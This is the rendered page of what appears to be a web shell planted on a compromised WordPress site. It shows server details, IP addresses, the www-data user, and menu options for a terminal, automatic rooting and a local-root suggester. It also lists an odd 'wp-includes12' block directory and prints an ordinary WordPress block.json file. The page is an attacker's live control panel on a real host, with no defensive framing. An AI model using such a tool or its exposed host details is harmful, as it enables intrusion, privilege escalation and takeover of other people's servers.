Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
maskenattest /
wp-includes12 /
blocks /
query /
Delete
Unzip
Name
Size
Permission
Date
Action
block.json
1.27
KB
-rw-r--r--
2026-02-20 12:52
editor-rtl.css
3.34
KB
-rw-r--r--
2026-02-09 21:15
editor-rtl.min.css
1.46
KB
-rw-r--r--
2026-01-06 10:50
editor.css
3.34
KB
-rw-r--r--
2026-02-09 21:15
editor.min.css
1.46
KB
-rw-r--r--
2026-01-06 10:50
view.asset.php
84
B
-rw-r--r--
2024-04-03 01:24
view.js
4.59
KB
-rw-r--r--
2026-02-08 03:16
view.min.asset.php
84
B
-rw-r--r--
2024-04-03 01:24
view.min.js
1.44
KB
-rw-r--r--
2025-04-16 09:02
Save
Rename
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query", "title": "Query Loop", "category": "theme", "description": "An advanced block that allows displaying post types based on different query parameters and visual configurations.", "keywords": [ "posts", "list", "blog", "blogs", "custom post types" ], "textdomain": "default", "attributes": { "queryId": { "type": "number" }, "query": { "type": "object", "default": { "perPage": null, "pages": 0, "offset": 0, "postType": "post", "order": "desc", "orderBy": "date", "author": "", "search": "", "exclude": [], "sticky": "", "inherit": true, "taxQuery": null, "parents": [], "format": [] } }, "tagName": { "type": "string", "default": "div" }, "namespace": { "type": "string" }, "enhancedPagination": { "type": "boolean", "default": false } }, "usesContext": [ "templateSlug" ], "providesContext": { "queryId": "queryId", "query": "query", "displayLayout": "displayLayout", "enhancedPagination": "enhancedPagination" }, "supports": { "anchor": true, "align": [ "wide", "full" ], "html": false, "layout": true, "interactivity": true }, "editorStyle": "wp-block-query-editor" }